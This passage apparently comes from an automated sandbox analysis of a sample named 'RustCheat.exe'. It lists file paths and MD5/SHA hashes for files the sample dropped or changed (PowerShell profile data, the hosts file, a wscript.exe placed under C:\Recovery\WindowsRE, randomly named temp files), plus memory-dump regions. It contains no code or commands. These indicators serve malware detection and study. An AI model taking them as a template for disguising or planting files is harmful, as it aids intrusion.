SHA1 1a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256 cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA512 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

memory/2704-136-0x00000212D4E10000-0x00000212D4E1A000-memory.dmp

memory/2704-137-0x00000212D5040000-0x00000212D5052000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 36d03a272b43b1c16e5bce541906f649
SHA1 66f0178c3182a09386738d60501411a14b4a3864
SHA256 3fe1814466c786b9b14e3d1b9f9348434db490bc462b9e071f7bcaea5ef9e270
SHA512 d6c34935c1c22bda2ffd3550e54ca77bca92ab46829d3acc58c263fec94f8b6fa578105a80121c78e6d38ee51ec8f1bb8ae74ba7844a207499145308ec982a3a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3443467f6555d6b3524dd70e46cff8dd
SHA1 3e44ee1e05e988c725b7374baffb94436a14cb4e
SHA256 ff5c1556068c1314c7a38718aeafbb4b362d0a5ee100ef1f236fd93306847baa
SHA512 1efead1fb284a707d7eef7a997e424ae4b63744a94c07a99c5a5d9e8775d55d9f7ed1191a94e046130afb2f308bc594d63f31398cef3ec204c24274ddaff4c19

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RustCheat.exe.log

MD5 4c8fa14eeeeda6fe76a08d14e08bf756
SHA1 30003b6798090ec74eb477bbed88e086f8552976
SHA256 7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5
SHA512 116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7f81c3ba861f1a722421cc95d105fecd
SHA1 1e6e9a67f190deb407c6fdbd224ce90b833490e0
SHA256 cebaa9795b2039a5784a0edcbf89cb298259a34c5aa7f89ba31344203ea37a81
SHA512 1d44780b537d2797aaa636d913e2fb5dc00484d3bf9cbf42a67c7cd7988ff756326e9725b832df85c0c2fb1bc7c25f1ffa66e9b3ae5127868f38a88546a7555d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b51dc9e5ec3c97f72b4ca9488bbb4462
SHA1 5c1e8c0b728cd124edcacefb399bbd5e25b21bd3
SHA256 976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db
SHA512 0e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb1ad317bd25b55b2bbdce8a28a74a94
SHA1 98a3978be4d10d62e7411946474579ee5bdc5ea6
SHA256 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512 d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

C:\Windows\System32\drivers\etc\hosts

MD5 4028457913f9d08b06137643fe3e01bc
SHA1 a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512 c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 74a6b79d36b4aae8b027a218bc6e1af7
SHA1 0350e46c1df6934903c4820a00b0bc4721779e5f
SHA256 60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04
SHA512 60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c5838f9ee921b4c449391e6adc1763fa
SHA1 d6690b109e2150a61a995fb40b2a3b6931053c86
SHA256 d6aad71bbd50b2660a31a0676eebf3f095ba1ac3a0800c4be9fd3dfded7a0fe7
SHA512 7056bdb5e0eb479494e4f101e04a410e774c280aa33de61561f91d090fefe81bff38f1a9ffcd8a75ebe5e024dfed4867fd45f7932d53c5c84ec3499a99dd9dae

memory/4792-341-0x00007FF863050000-0x00007FF863B11000-memory.dmp

memory/2800-367-0x0000000000410000-0x00000000005EE000-memory.dmp

memory/2800-369-0x0000000002780000-0x000000000278E000-memory.dmp

memory/2800-371-0x000000001B210000-0x000000001B22C000-memory.dmp

memory/2800-373-0x000000001B230000-0x000000001B248000-memory.dmp

memory/2800-375-0x000000001B1F0000-0x000000001B1F8000-memory.dmp

memory/2800-377-0x000000001B200000-0x000000001B20C000-memory.dmp

C:\Recovery\WindowsRE\wscript.exe

MD5 8ccc428a5a6f6139dc191d332f3de08b
SHA1 ae550a8fb67deeb1350020aa3fe8b0339db6bc71
SHA256 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749
SHA512 1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

memory/2800-422-0x000000001CC40000-0x000000001CD55000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uKHduJLxL6KTVQ1

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

C:\Users\Admin\AppData\Local\Temp\kjlpgQ4TCdNBpDW

MD5 8f5942354d3809f865f9767eddf51314
SHA1 20be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512 fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

C:\Users\Admin\AppData\Local\Temp\Yd6DgKBvNCXyV6p

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\6QxFtPFVBXAfpYj

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\6sre2kRyaUJ5KEK\Display\Display.png

MD5 4673dedb39902476a43db7db32840951
SHA1 390c159f2be8bcb58c7860360b1b37c9dfc5732c
SHA256 57f14bd24019815bd4249a1cb02ef6717f309ce5711004e3622febdb4f31751e
SHA512 a64b3beb97e4e5c08fd943d5b52d7d4759fba0881ff39433788ec932ad14c5c83d3cd5345c855df643655b6b939d99115ed76aee4908552157ba0629f6d84e3f

memory/3088-699-0x0000000000280000-0x0000000000288000-memory.dmp